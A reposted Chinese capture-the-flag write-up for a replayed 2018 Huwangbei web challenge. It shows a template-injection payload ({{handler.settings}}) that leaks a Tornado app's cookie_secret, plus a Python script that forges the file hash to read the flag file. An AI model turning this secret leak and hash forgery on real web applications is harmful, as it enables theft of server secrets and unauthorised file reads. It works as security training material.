转载https://blog.csdn.net/weixin_40871137/article/details/94998636
这题是2018护网杯原题的复现。
进去之后显示三个txt,每个点进去看看。内容如下:
/flag.txt
flag in /fllllllllllllag
/welcome.txt
render
/hints.txt
md5(cookie_secret+md5(filename))
看看url,发现web9.buuoj.cn/file?filename=/flag.txt&filehash=245a5ccf5543f16709d8c22851af5454
把filename改成/fllllllllllllag试试,进入一个报错页面。url也很有意思buuoj.cn/error?msg=Error
试着把msg的值改成123看看,成功输出到页面。再结合提示render(大佬wp提示模板注入),msg={{handler.settings}}
现在我们就得到cookie_secret了,再利用之前的提示hints.txt我们就能得到filehash的值了。脚本如下
import hashlib
def md5value(s):
md5 = hashlib.md5()
md5.update(s)
return md5.hexdigest()
def jiami():
filename = '/fllllllllllllag'
cookie_s ="M)Z.>}{O]lYIp(oW7$dc132uDaK<C%wqj@PA![VtR#geh9UHsbnL_+mT5N~J84*r"
print(md5value(filename.encode('utf-8')))
x=md5value(filename.encode('utf-8'))
y=cookie_s+x
print(md5value(y.encode('utf-8')))
jiami()